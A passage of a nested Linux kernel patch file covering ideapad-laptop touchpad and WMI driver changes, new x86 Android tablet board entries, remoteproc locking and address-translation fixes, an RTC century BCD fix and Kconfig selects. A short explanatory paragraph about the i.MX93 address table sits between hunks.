+ {
+ 	unsigned long value;
++	unsigned char param;
++	int ret;
+ 
+-	if (!priv->features.touchpad_ctrl_via_ec)
++	/* Without reading from the EC, the touchpad LED doesn't switch state */
++	ret = read_ec_data(priv->adev->handle, VPCCMD_R_TOUCHPAD, &value);
++	if (ret)
+ 		return;
+ 
+-	/* Without reading from EC touchpad LED doesn't switch state */
+-	if (!read_ec_data(priv->adev->handle, VPCCMD_R_TOUCHPAD, &value)) {
+-		unsigned char param;
++	/*
++	 * Some IdeaPads don't really turn off touchpad - they only
++	 * switch the LED state. We (de)activate KBC AUX port to turn
++	 * touchpad off and on. We send KEY_TOUCHPAD_OFF and
++	 * KEY_TOUCHPAD_ON so as not to get out of sync with the LED
++	 */
++	if (priv->features.ctrl_ps2_aux_port)
++		i8042_command(&param, value ? I8042_CMD_AUX_ENABLE : I8042_CMD_AUX_DISABLE);
++
++	if (send_events) {
+ 		/*
+-		 * Some IdeaPads don't really turn off touchpad - they only
+-		 * switch the LED state. We (de)activate KBC AUX port to turn
+-		 * touchpad off and on. We send KEY_TOUCHPAD_OFF and
+-		 * KEY_TOUCHPAD_ON to not to get out of sync with LED
++		 * On older models the EC controls the touchpad and toggles it
++		 * on/off itself; in that case we report KEY_TOUCHPAD_ON/_OFF.
++		 * If the EC did not toggle, report KEY_TOUCHPAD_TOGGLE.
+ 		 */
+-		i8042_command(&param, value ? I8042_CMD_AUX_ENABLE : I8042_CMD_AUX_DISABLE);
+-		ideapad_input_report(priv, value ? 67 : 66);
+-		sysfs_notify(&priv->platform_device->dev.kobj, NULL, "touchpad");
++		if (value != priv->r_touchpad_val) {
++			ideapad_input_report(priv, value ? 67 : 66);
++			sysfs_notify(&priv->platform_device->dev.kobj, NULL, "touchpad");
++		} else {
++			ideapad_input_report(priv, 68);
++		}
+ 	}
++
++	priv->r_touchpad_val = value;
+ }
+ 
+ static void ideapad_acpi_notify(acpi_handle handle, u32 event, void *data)
+@@ -1474,7 +1575,7 @@ static void ideapad_acpi_notify(acpi_handle handle, u32 event, void *data)
+ 			ideapad_sync_rfk_state(priv);
+ 			break;
+ 		case 5:
+-			ideapad_sync_touchpad_state(priv);
++			ideapad_sync_touchpad_state(priv, true);
+ 			break;
+ 		case 4:
+ 			ideapad_backlight_notify_brightness(priv);
+@@ -1505,33 +1606,6 @@ static void ideapad_acpi_notify(acpi_handle handle, u32 event, void *data)
+ 	}
+ }
+ 
+-#if IS_ENABLED(CONFIG_ACPI_WMI)
+-static void ideapad_wmi_notify(u32 value, void *context)
+-{
+-	struct ideapad_private *priv = context;
+-	unsigned long result;
+-
+-	switch (value) {
+-	case 128:
+-		ideapad_input_report(priv, value);
+-		break;
+-	case 208:
+-		if (!priv->features.set_fn_lock_led)
+-			break;
+-
+-		if (!eval_hals(priv->adev->handle, &result)) {
+-			bool state = test_bit(HALS_FNLOCK_STATE_BIT, &result);
+-
+-			exec_sals(priv->adev->handle, state ? SALS_FNLOCK_ON : SALS_FNLOCK_OFF);
+-		}
+-		break;
+-	default:
+-		dev_info(&priv->platform_device->dev,
+-			 "Unknown WMI event: %u\n", value);
+-	}
+-}
+-#endif
+-
+ /* On some models we need to call exec_sals(SALS_FNLOCK_ON/OFF) to set the LED */
+ static const struct dmi_system_id set_fn_lock_led_list[] = {
+ 	{
+@@ -1563,6 +1637,23 @@ static const struct dmi_system_id hw_rfkill_list[] = {
+ 	{}
+ };
+ 
++/*
++ * On some models the EC toggles the touchpad muted LED on touchpad toggle
++ * hotkey presses, but the EC does not actually disable the touchpad itself.
++ * On these models the driver needs to explicitly enable/disable the i8042
++ * (PS/2) aux port.
++ */
++static const struct dmi_system_id ctrl_ps2_aux_port_list[] = {
++	{
++	/* Lenovo Ideapad Z570 */
++	.matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++		DMI_MATCH(DMI_PRODUCT_VERSION, "Ideapad Z570"),
++		},
++	},
++	{}
++};
++
+ static const struct dmi_system_id no_touchpad_switch_list[] = {
+ 	{
+ 	.ident = "Lenovo Yoga 3 Pro 1370",
+@@ -1590,6 +1681,8 @@ static void ideapad_check_features(struct ideapad_private *priv)
+ 		set_fn_lock_led || dmi_check_system(set_fn_lock_led_list);
+ 	priv->features.hw_rfkill_switch =
+ 		hw_rfkill_switch || dmi_check_system(hw_rfkill_list);
++	priv->features.ctrl_ps2_aux_port =
++		ctrl_ps2_aux_port || dmi_check_system(ctrl_ps2_aux_port_list);
+ 
+ 	/* Most ideapads with ELAN0634 touchpad don't use EC touchpad switch */
+ 	if (acpi_dev_present("ELAN0634", NULL, -1))
+@@ -1622,6 +1715,118 @@ static void ideapad_check_features(struct ideapad_private *priv)
+ 	}
+ }
+ 
++#if IS_ENABLED(CONFIG_ACPI_WMI)
++/*
++ * WMI driver
++ */
++enum ideapad_wmi_event_type {
++	IDEAPAD_WMI_EVENT_ESC,
++	IDEAPAD_WMI_EVENT_FN_KEYS,
++};
++
++struct ideapad_wmi_private {
++	enum ideapad_wmi_event_type event;
++};
++
++static int ideapad_wmi_probe(struct wmi_device *wdev, const void *context)
++{
++	struct ideapad_wmi_private *wpriv;
++
++	wpriv = devm_kzalloc(&wdev->dev, sizeof(*wpriv), GFP_KERNEL);
++	if (!wpriv)
++		return -ENOMEM;
++
++	*wpriv = *(const struct ideapad_wmi_private *)context;
++
++	dev_set_drvdata(&wdev->dev, wpriv);
++	return 0;
++}
++
++static void ideapad_wmi_notify(struct wmi_device *wdev, union acpi_object *data)
++{
++	struct ideapad_wmi_private *wpriv = dev_get_drvdata(&wdev->dev);
++	struct ideapad_private *priv;
++	unsigned long result;
++
++	mutex_lock(&ideapad_shared_mutex);
++
++	priv = ideapad_shared;
++	if (!priv)
++		goto unlock;
++
++	switch (wpriv->event) {
++	case IDEAPAD_WMI_EVENT_ESC:
++		ideapad_input_report(priv, 128);
++		break;
++	case IDEAPAD_WMI_EVENT_FN_KEYS:
++		if (priv->features.set_fn_lock_led &&
++		    !eval_hals(priv->adev->handle, &result)) {
++			bool state = test_bit(HALS_FNLOCK_STATE_BIT, &result);
++
++			exec_sals(priv->adev->handle, state ? SALS_FNLOCK_ON : SALS_FNLOCK_OFF);
++		}
++
++		if (data->type != ACPI_TYPE_INTEGER) {
++			dev_warn(&wdev->dev,
++				 "WMI event data is not an integer\n");
++			break;
++		}
++
++		dev_dbg(&wdev->dev, "WMI fn-key event: 0x%llx\n",
++			data->integer.value);
++
++		ideapad_input_report(priv,
++				     data->integer.value | IDEAPAD_WMI_KEY);
++
++		break;
++	}
++unlock:
++	mutex_unlock(&ideapad_shared_mutex);
++}
++
++static const struct ideapad_wmi_private ideapad_wmi_context_esc = {
++	.event = IDEAPAD_WMI_EVENT_ESC
++};
++
++static const struct ideapad_wmi_private ideapad_wmi_context_fn_keys = {
++	.event = IDEAPAD_WMI_EVENT_FN_KEYS
++};
++
++static const struct wmi_device_id ideapad_wmi_ids[] = {
++	{ "26CAB2E5-5CF1-46AE-AAC3-4A12B6BA50E6", &ideapad_wmi_context_esc }, /* Yoga 3 */
++	{ "56322276-8493-4CE8-A783-98C991274F5E", &ideapad_wmi_context_esc }, /* Yoga 700 */
++	{ "8FC0DE0C-B4E4-43FD-B0F3-8871711C1294", &ideapad_wmi_context_fn_keys }, /* Legion 5 */
++	{},
++};
++MODULE_DEVICE_TABLE(wmi, ideapad_wmi_ids);
++
++static struct wmi_driver ideapad_wmi_driver = {
++	.driver = {
++		.name = "ideapad_wmi",
++	},
++	.id_table = ideapad_wmi_ids,
++	.probe = ideapad_wmi_probe,
++	.notify = ideapad_wmi_notify,
++};
++
++static int ideapad_wmi_driver_register(void)
++{
++	return wmi_driver_register(&ideapad_wmi_driver);
++}
++
++static void ideapad_wmi_driver_unregister(void)
++{
++	return wmi_driver_unregister(&ideapad_wmi_driver);
++}
++
++#else
++static inline int ideapad_wmi_driver_register(void) { return 0; }
++static inline void ideapad_wmi_driver_unregister(void) { }
++#endif
++
++/*
++ * ACPI driver
++ */
+ static int ideapad_acpi_add(struct platform_device *pdev)
+ {
+ 	struct acpi_device *adev = ACPI_COMPANION(&pdev->dev);
+@@ -1670,16 +1875,12 @@ static int ideapad_acpi_add(struct platform_device *pdev)
+ 	if (!priv->features.hw_rfkill_switch)
+ 		write_ec_cmd(priv->adev->handle, VPCCMD_W_RF, 1);
+ 
+-	/* The same for Touchpad */
+-	if (!priv->features.touchpad_ctrl_via_ec)
+-		write_ec_cmd(priv->adev->handle, VPCCMD_W_TOUCHPAD, 1);
+-
+ 	for (i = 0; i < IDEAPAD_RFKILL_DEV_NUM; i++)
+ 		if (test_bit(ideapad_rfk_data[i].cfgbit, &priv->cfg))
+ 			ideapad_register_rfkill(priv, i);
+ 
+ 	ideapad_sync_rfk_state(priv);
+-	ideapad_sync_touchpad_state(priv);
++	ideapad_sync_touchpad_state(priv, false);
+ 
+ 	err = ideapad_dytc_profile_init(priv);
+ 	if (err) {
+@@ -1703,30 +1904,16 @@ static int ideapad_acpi_add(struct platform_device *pdev)
+ 		goto notification_failed;
+ 	}
+ 
+-#if IS_ENABLED(CONFIG_ACPI_WMI)
+-	for (i = 0; i < ARRAY_SIZE(ideapad_wmi_fnesc_events); i++) {
+-		status = wmi_install_notify_handler(ideapad_wmi_fnesc_events[i],
+-						    ideapad_wmi_notify, priv);
+-		if (ACPI_SUCCESS(status)) {
+-			priv->fnesc_guid = ideapad_wmi_fnesc_events[i];
+-			break;
+-		}
+-	}
+-
+-	if (ACPI_FAILURE(status) && status != AE_NOT_EXIST) {
+-		err = -EIO;
+-		goto notification_failed_wmi;
+-	}
+-#endif
++	err = ideapad_shared_init(priv);
++	if (err)
++		goto shared_init_failed;
+ 
+ 	return 0;
+ 
+-#if IS_ENABLED(CONFIG_ACPI_WMI)
+-notification_failed_wmi:
++shared_init_failed:
+ 	acpi_remove_notify_handler(priv->adev->handle,
+ 				   ACPI_DEVICE_NOTIFY,
+ 				   ideapad_acpi_notify);
+-#endif
+ 
+ notification_failed:
+ 	ideapad_backlight_exit(priv);
+@@ -1752,10 +1939,7 @@ static int ideapad_acpi_remove(struct platform_device *pdev)
+ 	struct ideapad_private *priv = dev_get_drvdata(&pdev->dev);
+ 	int i;
+ 
+-#if IS_ENABLED(CONFIG_ACPI_WMI)
+-	if (priv->fnesc_guid)
+-		wmi_remove_notify_handler(priv->fnesc_guid);
+-#endif
++	ideapad_shared_exit(priv);
+ 
+ 	acpi_remove_notify_handler(priv->adev->handle,
+ 				   ACPI_DEVICE_NOTIFY,
+@@ -1781,7 +1965,7 @@ static int ideapad_acpi_resume(struct device *dev)
+ 	struct ideapad_private *priv = dev_get_drvdata(dev);
+ 
+ 	ideapad_sync_rfk_state(priv);
+-	ideapad_sync_touchpad_state(priv);
++	ideapad_sync_touchpad_state(priv, false);
+ 
+ 	if (priv->dytc)
+ 		dytc_profile_refresh(priv);
+@@ -1807,7 +1991,30 @@ static struct platform_driver ideapad_acpi_driver = {
+ 	},
+ };
+ 
+-module_platform_driver(ideapad_acpi_driver);
++static int __init ideapad_laptop_init(void)
++{
++	int err;
++
++	err = ideapad_wmi_driver_register();
++	if (err)
++		return err;
++
++	err = platform_driver_register(&ideapad_acpi_driver);
++	if (err) {
++		ideapad_wmi_driver_unregister();
++		return err;
++	}
++
++	return 0;
++}
++module_init(ideapad_laptop_init)
++
++static void __exit ideapad_laptop_exit(void)
++{
++	ideapad_wmi_driver_unregister();
++	platform_driver_unregister(&ideapad_acpi_driver);
++}
++module_exit(ideapad_laptop_exit)
+ 
+ MODULE_AUTHOR("David Woodhouse <dwmw2@infradead.org>");
+ MODULE_DESCRIPTION("IdeaPad ACPI Extras");
+diff --git a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency.c b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency.c
+index 8f9c571d72578..00ac7e381441a 100644
+--- a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency.c
++++ b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency.c
+@@ -203,6 +203,7 @@ static const struct x86_cpu_id intel_uncore_cpu_ids[] = {
+ 	X86_MATCH_INTEL_FAM6_MODEL(ICELAKE_X,	NULL),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ICELAKE_D,	NULL),
+ 	X86_MATCH_INTEL_FAM6_MODEL(SAPPHIRERAPIDS_X, NULL),
++	X86_MATCH_INTEL_FAM6_MODEL(EMERALDRAPIDS_X, NULL),
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(x86cpu, intel_uncore_cpu_ids);
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 8476dfef4e626..a1d91736a03b8 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -5572,6 +5572,7 @@ static enum led_brightness light_sysfs_get(struct led_classdev *led_cdev)
+ static struct tpacpi_led_classdev tpacpi_led_thinklight = {
+ 	.led_classdev = {
+ 		.name		= "tpacpi::thinklight",
++		.max_brightness	= 1,
+ 		.brightness_set_blocking = &light_sysfs_set,
+ 		.brightness_get	= &light_sysfs_get,
+ 	}
+diff --git a/drivers/platform/x86/x86-android-tablets.c b/drivers/platform/x86/x86-android-tablets.c
+index 4acd6fa8d43b8..123a4618db55f 100644
+--- a/drivers/platform/x86/x86-android-tablets.c
++++ b/drivers/platform/x86/x86-android-tablets.c
+@@ -5,7 +5,7 @@
+  * devices typically have a bunch of things hardcoded, rather than specified
+  * in their DSDT.
+  *
+- * Copyright (C) 2021 Hans de Goede <hdegoede@redhat.com>
++ * Copyright (C) 2021-2022 Hans de Goede <hdegoede@redhat.com>
+  */
+ 
+ #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+@@ -265,6 +265,56 @@ static struct gpiod_lookup_table int3496_gpo2_pin22_gpios = {
+ 	},
+ };
+ 
++/*
++ * Advantech MICA-071
++ * This is a standard Windows tablet, but it has an extra "quick launch" button
++ * which is not described in the ACPI tables in any way.
++ * Use the x86-android-tablets infra to create a gpio-button device for this.
++ */
++static struct gpio_keys_button advantech_mica_071_button = {
++	.code = KEY_PROG1,
++	/* .gpio gets filled in by advantech_mica_071_init() */
++	.active_low = true,
++	.desc = "prog1_key",
++	.type = EV_KEY,
++	.wakeup = false,
++	.debounce_interval = 50,
++};
++
++static const struct gpio_keys_platform_data advantech_mica_071_button_pdata __initconst = {
++	.buttons = &advantech_mica_071_button,
++	.nbuttons = 1,
++	.name = "prog1_key",
++};
++
++static const struct platform_device_info advantech_mica_071_pdevs[] __initconst = {
++	{
++		.name = "gpio-keys",
++		.id = PLATFORM_DEVID_AUTO,
++		.data = &advantech_mica_071_button_pdata,
++		.size_data = sizeof(advantech_mica_071_button_pdata),
++	},
++};
++
++static int __init advantech_mica_071_init(void)
++{
++	struct gpio_desc *gpiod;
++	int ret;
++
++	ret = x86_android_tablet_get_gpiod("INT33FC:00", 2, &gpiod);
++	if (ret < 0)
++		return ret;
++	advantech_mica_071_button.gpio = desc_to_gpio(gpiod);
++
++	return 0;
++}
++
++static const struct x86_dev_info advantech_mica_071_info __initconst = {
++	.pdev_info = advantech_mica_071_pdevs,
++	.pdev_count = ARRAY_SIZE(advantech_mica_071_pdevs),
++	.init = advantech_mica_071_init,
++};
++
+ /* Asus ME176C and TF103C tablets shared data */
+ static struct gpio_keys_button asus_me176c_tf103c_lid = {
+ 	.code = SW_LID,
+@@ -987,6 +1037,212 @@ static void lenovo_yoga_tab2_830_1050_exit(void)
+ 	}
+ }
+ 
++/* Lenovo Yoga Tab 3 Pro YT3-X90F */
++
++/*
++ * There are 2 batteries, with 2 bq27500 fuel-gauges and 2 bq25892 chargers,
++ * "bq25890-charger-1" is instantiated from: drivers/i2c/busses/i2c-cht-wc.c.
++ */
++static const char * const lenovo_yt3_bq25892_0_suppliers[] = { "cht_wcove_pwrsrc" };
++static const char * const bq25890_1_psy[] = { "bq25890-charger-1" };
++
++static const struct property_entry fg_bq25890_1_supply_props[] = {
++	PROPERTY_ENTRY_STRING_ARRAY("supplied-from", bq25890_1_psy),
++	{ }
++};
++
++static const struct software_node fg_bq25890_1_supply_node = {
++	.properties = fg_bq25890_1_supply_props,
++};
++
++/* bq25892 charger settings for the flat lipo battery behind the screen */
++static const struct property_entry lenovo_yt3_bq25892_0_props[] = {
++	PROPERTY_ENTRY_STRING_ARRAY("supplied-from", lenovo_yt3_bq25892_0_suppliers),
++	PROPERTY_ENTRY_STRING("linux,power-supply-name", "bq25892-second-chrg"),
++	PROPERTY_ENTRY_U32("linux,iinlim-percentage", 40),
++	PROPERTY_ENTRY_BOOL("linux,skip-reset"),
++	/* Values taken from Android Factory Image */
++	PROPERTY_ENTRY_U32("ti,charge-current", 2048000),
++	PROPERTY_ENTRY_U32("ti,battery-regulation-voltage", 4352000),
++	PROPERTY_ENTRY_U32("ti,termination-current", 128000),
++	PROPERTY_ENTRY_U32("ti,precharge-current", 128000),
++	PROPERTY_ENTRY_U32("ti,minimum-sys-voltage", 3700000),
++	PROPERTY_ENTRY_U32("ti,boost-voltage", 4998000),
++	PROPERTY_ENTRY_U32("ti,boost-max-current", 500000),
++	PROPERTY_ENTRY_BOOL("ti,use-ilim-pin"),
++	{ }
++};
++
++static const struct software_node lenovo_yt3_bq25892_0_node = {
++	.properties = lenovo_yt3_bq25892_0_props,
++};
++
++static const struct x86_i2c_client_info lenovo_yt3_i2c_clients[] __initconst = {
++	{
++		/* bq27500 fuel-gauge for the flat lipo battery behind the screen */
++		.board_info = {
++			.type = "bq27500",
++			.addr = 0x55,
++			.dev_name = "bq27500_0",
++			.swnode = &fg_bq25890_supply_node,
++		},
++		.adapter_path = "\\_SB_.PCI0.I2C1",
++	}, {
++		/* bq25892 charger for the flat lipo battery behind the screen */
++		.board_info = {
++			.type = "bq25892",
++			.addr = 0x6b,
++			.dev_name = "bq25892_0",
++			.swnode = &lenovo_yt3_bq25892_0_node,
++		},
++		.adapter_path = "\\_SB_.PCI0.I2C1",
++		.irq_data = {
++			.type = X86_ACPI_IRQ_TYPE_GPIOINT,
++			.chip = "INT33FF:01",
++			.index = 5,
++			.trigger = ACPI_EDGE_SENSITIVE,
++			.polarity = ACPI_ACTIVE_LOW,
++		},
++	}, {
++		/* bq27500 fuel-gauge for the round li-ion cells in the hinge */
++		.board_info = {
++			.type = "bq27500",
++			.addr = 0x55,
++			.dev_name = "bq27500_1",
++			.swnode = &fg_bq25890_1_supply_node,
++		},
++		.adapter_path = "\\_SB_.PCI0.I2C2",
++	}
++};
++
++static int __init lenovo_yt3_init(void)
++{
++	struct gpio_desc *gpiod;
++	int ret;
++
++	/*
++	 * The "bq25892_0" charger IC has its /CE (Charge-Enable) and OTG pins
++	 * connected to GPIOs, rather than having them hardwired to the correct
++	 * values as is normally done.
++	 *
++	 * The bq25890_charger driver controls these through I2C, but this only
++	 * works if not overridden by the pins. Set these pins here:
++	 * 1. Set /CE to 0 to allow charging.
++	 * 2. Set OTG to 0 to disable the V5 boost output since the 5V boost output of
++	 *    the main "bq25892_1" charger is used when necessary.
++	 */
++
++	/* /CE pin */
++	ret = x86_android_tablet_get_gpiod("INT33FF:02", 22, &gpiod);
++	if (ret < 0)
++		return ret;
++
++	/*
++	 * The gpio_desc returned by x86_android_tablet_get_gpiod() is a "raw"
++	 * gpio_desc, that is, there is no way to pass lookup-flags like
++	 * GPIO_ACTIVE_LOW. Set the GPIO to 0 here to enable charging since
++	 * the /CE pin is active-low, but not marked as such in the gpio_desc.
++	 */
++	gpiod_set_value(gpiod, 0);
++
++	/* OTG pin */
++	ret = x86_android_tablet_get_gpiod("INT33FF:03", 19, &gpiod);
++	if (ret < 0)
++		return ret;
++
++	gpiod_set_value(gpiod, 0);
++
++	return 0;
++}
++
++static const struct x86_dev_info lenovo_yt3_info __initconst = {
++	.i2c_client_info = lenovo_yt3_i2c_clients,
++	.i2c_client_count = ARRAY_SIZE(lenovo_yt3_i2c_clients),
++	.init = lenovo_yt3_init,
++};
++
++/* Medion Lifetab S10346 tablets have an Android factory img with everything hardcoded */
++static const char * const medion_lifetab_s10346_accel_mount_matrix[] = {
++	"0", "1", "0",
++	"1", "0", "0",
++	"0", "0", "1"
++};
++
++static const struct property_entry medion_lifetab_s10346_accel_props[] = {
++	PROPERTY_ENTRY_STRING_ARRAY("mount-matrix", medion_lifetab_s10346_accel_mount_matrix),
++	{ }
++};
++
++static const struct software_node medion_lifetab_s10346_accel_node = {
++	.properties = medion_lifetab_s10346_accel_props,
++};
++
++/* Note the LCD panel is mounted upside down, this is correctly indicated in the VBT */
++static const struct property_entry medion_lifetab_s10346_touchscreen_props[] = {
++	PROPERTY_ENTRY_BOOL("touchscreen-inverted-x"),
++	PROPERTY_ENTRY_BOOL("touchscreen-swapped-x-y"),
++	{ }
++};
++
++static const struct software_node medion_lifetab_s10346_touchscreen_node = {
++	.properties = medion_lifetab_s10346_touchscreen_props,
++};
++
++static const struct x86_i2c_client_info medion_lifetab_s10346_i2c_clients[] __initconst = {
++	{
++		/* kxtj21009 accel */
++		.board_info = {
++			.type = "kxtj21009",
++			.addr = 0x0f,
++			.dev_name = "kxtj21009",
++			.swnode = &medion_lifetab_s10346_accel_node,
++		},
++		.adapter_path = "\\_SB_.I2C3",
++		.irq_data = {
++			.type = X86_ACPI_IRQ_TYPE_GPIOINT,
++			.chip = "INT33FC:02",
++			.index = 23,
++			.trigger = ACPI_EDGE_SENSITIVE,
++			.polarity = ACPI_ACTIVE_HIGH,
++		},
++	}, {
++		/* goodix touchscreen */
++		.board_info = {
++			.type = "GDIX1001:00",
++			.addr = 0x14,
++			.dev_name = "goodix_ts",
++			.swnode = &medion_lifetab_s10346_touchscreen_node,
++		},
++		.adapter_path = "\\_SB_.I2C4",
++		.irq_data = {
++			.type = X86_ACPI_IRQ_TYPE_APIC,
++			.index = 0x44,
++			.trigger = ACPI_EDGE_SENSITIVE,
++			.polarity = ACPI_ACTIVE_LOW,
++		},
++	},
++};
++
++static struct gpiod_lookup_table medion_lifetab_s10346_goodix_gpios = {
++	.dev_id = "i2c-goodix_ts",
++	.table = {
++		GPIO_LOOKUP("INT33FC:01", 26, "reset", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("INT33FC:02", 3, "irq", GPIO_ACTIVE_HIGH),
++		{ }
++	},
++};
++
++static struct gpiod_lookup_table * const medion_lifetab_s10346_gpios[] = {
++	&medion_lifetab_s10346_goodix_gpios,
++	NULL
++};
++
++static const struct x86_dev_info medion_lifetab_s10346_info __initconst = {
++	.i2c_client_info = medion_lifetab_s10346_i2c_clients,
++	.i2c_client_count = ARRAY_SIZE(medion_lifetab_s10346_i2c_clients),
++	.gpiod_lookup_tables = medion_lifetab_s10346_gpios,
++};
++
+ /* Nextbook Ares 8 tablets have an Android factory img with everything hardcoded */
+ static const char * const nextbook_ares8_accel_mount_matrix[] = {
+ 	"0", "-1", "0",
+@@ -1179,6 +1435,14 @@ static const struct x86_dev_info xiaomi_mipad2_info __initconst = {
+ };
+ 
+ static const struct dmi_system_id x86_android_tablet_ids[] __initconst = {
++	{
++		/* Advantech MICA-071 */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Advantech"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "MICA-071"),
++		},
++		.driver_data = (void *)&advantech_mica_071_info,
++	},
+ 	{
+ 		/* Asus MeMO Pad 7 ME176C */
+ 		.matches = {
+@@ -1245,6 +1509,25 @@ static const struct dmi_system_id x86_android_tablet_ids[] __initconst = {
+ 		},
+ 		.driver_data = (void *)&lenovo_yoga_tab2_830_1050_info,
+ 	},
++	{
++		/* Lenovo Yoga Tab 3 Pro YT3-X90F */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++			DMI_MATCH(DMI_PRODUCT_VERSION, "Blade3-10A-001"),
++		},
++		.driver_data = (void *)&lenovo_yt3_info,
++	},
++	{
++		/* Medion Lifetab S10346 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "AMI Corporation"),
++			DMI_MATCH(DMI_BOARD_NAME, "Aptio CRB"),
++			/* Above strings are much too generic, so also match on BIOS date */
++			DMI_MATCH(DMI_BIOS_DATE, "10/22/2015"),
++		},
++		.driver_data = (void *)&medion_lifetab_s10346_info,
++	},
+ 	{
+ 		/* Nextbook Ares 8 */
+ 		.matches = {
+diff --git a/drivers/remoteproc/imx_dsp_rproc.c b/drivers/remoteproc/imx_dsp_rproc.c
+index 899aa8dd12f07..95da1cbefacf0 100644
+--- a/drivers/remoteproc/imx_dsp_rproc.c
++++ b/drivers/remoteproc/imx_dsp_rproc.c
+@@ -347,9 +347,6 @@ static int imx_dsp_rproc_stop(struct rproc *rproc)
+ 	struct device *dev = rproc->dev.parent;
+ 	int ret = 0;
+ 
+-	/* Make sure work is finished */
+-	flush_work(&priv->rproc_work);
+-
+ 	if (rproc->state == RPROC_CRASHED) {
+ 		priv->flags &= ~REMOTE_IS_READY;
+ 		return 0;
+@@ -432,9 +429,18 @@ static void imx_dsp_rproc_vq_work(struct work_struct *work)
+ {
+ 	struct imx_dsp_rproc *priv = container_of(work, struct imx_dsp_rproc,
+ 						  rproc_work);
++	struct rproc *rproc = priv->rproc;
++
++	mutex_lock(&rproc->lock);
++
++	if (rproc->state != RPROC_RUNNING)
++		goto unlock_mutex;
+ 
+ 	rproc_vq_interrupt(priv->rproc, 0);
+ 	rproc_vq_interrupt(priv->rproc, 1);
++
++unlock_mutex:
++	mutex_unlock(&rproc->lock);
+ }
+ 
+ /**
+diff --git a/drivers/remoteproc/imx_rproc.c b/drivers/remoteproc/imx_rproc.c
+index 7cc4fd207e2d8..596e1440cca56 100644
+--- a/drivers/remoteproc/imx_rproc.c
++++ b/drivers/remoteproc/imx_rproc.c
+@@ -113,8 +113,8 @@ static const struct imx_rproc_att imx_rproc_att_imx93[] = {
+ 	{ 0x80000000, 0x80000000, 0x10000000, 0 },
+ 	{ 0x90000000, 0x80000000, 0x10000000, 0 },
+ 
+-	{ 0xC0000000, 0xa0000000, 0x10000000, 0 },
+-	{ 0xD0000000, 0xa0000000, 0x10000000, 0 },
++	{ 0xC0000000, 0xC0000000, 0x10000000, 0 },
++	{ 0xD0000000, 0xC0000000, 0x10000000, 0 },
+ };
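
Each att entry is a { device address, system bus address, size } window, and remote-core addresses are translated by their offset within the window; the corrected rows make the 0xC0000000 aliases land in DDR at 0xC0000000 instead of the unrelated 0xA0000000 range. A sketch of the lookup, assuming the imx_rproc field names:

	/* da = address as seen by the remote core */
	if (da >= att->da && da + len <= att->da + att->size)
		return att->sa + (da - att->da);	/* host-side address */
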
+ 
+ static const struct imx_rproc_att imx_rproc_att_imx8mn[] = {
+diff --git a/drivers/remoteproc/remoteproc_core.c b/drivers/remoteproc/remoteproc_core.c
+index cb1d414a23896..c3f194d9384da 100644
+--- a/drivers/remoteproc/remoteproc_core.c
++++ b/drivers/remoteproc/remoteproc_core.c
+@@ -1868,12 +1868,18 @@ static void rproc_crash_handler_work(struct work_struct *work)
+ 
+ 	mutex_lock(&rproc->lock);
+ 
+-	if (rproc->state == RPROC_CRASHED || rproc->state == RPROC_OFFLINE) {
++	if (rproc->state == RPROC_CRASHED) {
+ 		/* handle only the first crash detected */
+ 		mutex_unlock(&rproc->lock);
+ 		return;
+ 	}
+ 
++	if (rproc->state == RPROC_OFFLINE) {
++		/* Don't recover if the remote processor was stopped */
++		mutex_unlock(&rproc->lock);
++		goto out;
++	}
++
+ 	rproc->state = RPROC_CRASHED;
+ 	dev_err(dev, "handling crash #%u in %s\n", ++rproc->crash_cnt,
+ 		rproc->name);
+@@ -1883,6 +1889,7 @@ static void rproc_crash_handler_work(struct work_struct *work)
+ 	if (!rproc->recovery_disabled)
+ 		rproc_trigger_recovery(rproc);
+ 
++out:
+ 	pm_relax(rproc->dev.parent);
+ }
+ 
+diff --git a/drivers/rtc/rtc-ds1347.c b/drivers/rtc/rtc-ds1347.c
+index 157bf5209ac40..a40c1a52df659 100644
+--- a/drivers/rtc/rtc-ds1347.c
++++ b/drivers/rtc/rtc-ds1347.c
+@@ -112,7 +112,7 @@ static int ds1347_set_time(struct device *dev, struct rtc_time *dt)
+ 		return err;
+ 
+ 	century = (dt->tm_year / 100) + 19;
+-	err = regmap_write(map, DS1347_CENTURY_REG, century);
++	err = regmap_write(map, DS1347_CENTURY_REG, bin2bcd(century));
+ 	if (err)
+ 		return err;
+ 
+diff --git a/drivers/soc/qcom/Kconfig b/drivers/soc/qcom/Kconfig
+index 024e420f1bb77..ae504c43d9e74 100644
+--- a/drivers/soc/qcom/Kconfig
++++ b/drivers/soc/qcom/Kconfig
+@@ -63,6 +63,7 @@ config QCOM_GSBI
+ config QCOM_LLCC
+ 	tristate "Qualcomm Technologies, Inc. LLCC driver"
+ 	depends on ARCH_QCOM || COMPILE_TEST
++	select REGMAP_MMIO
+ 	help
+ 	  Qualcomm Technologies, Inc. platform specific
+ 	  Last Level Cache Controller(LLCC) driver for platforms such as,
+@@ -236,6 +237,7 @@ config QCOM_ICC_BWMON
+ 	tristate "QCOM Interconnect Bandwidth Monitor driver"
+ 	depends on ARCH_QCOM || COMPILE_TEST
+ 	select PM_OPP
++	select REGMAP_MMIO
+ 	help
+ 	  Sets up driver monitoring bandwidth on various interconnects and
+ 	  based on that voting for interconnect bandwidth, adjusting their
+diff --git a/drivers/soc/ux500/ux500-soc-id.c b/drivers/soc/ux500/ux500-soc-id.c
+index a9472e0e5d61c..27d6e25a01153 100644
+--- a/drivers/soc/ux500/ux500-soc-id.c
++++ b/drivers/soc/ux500/ux500-soc-id.c
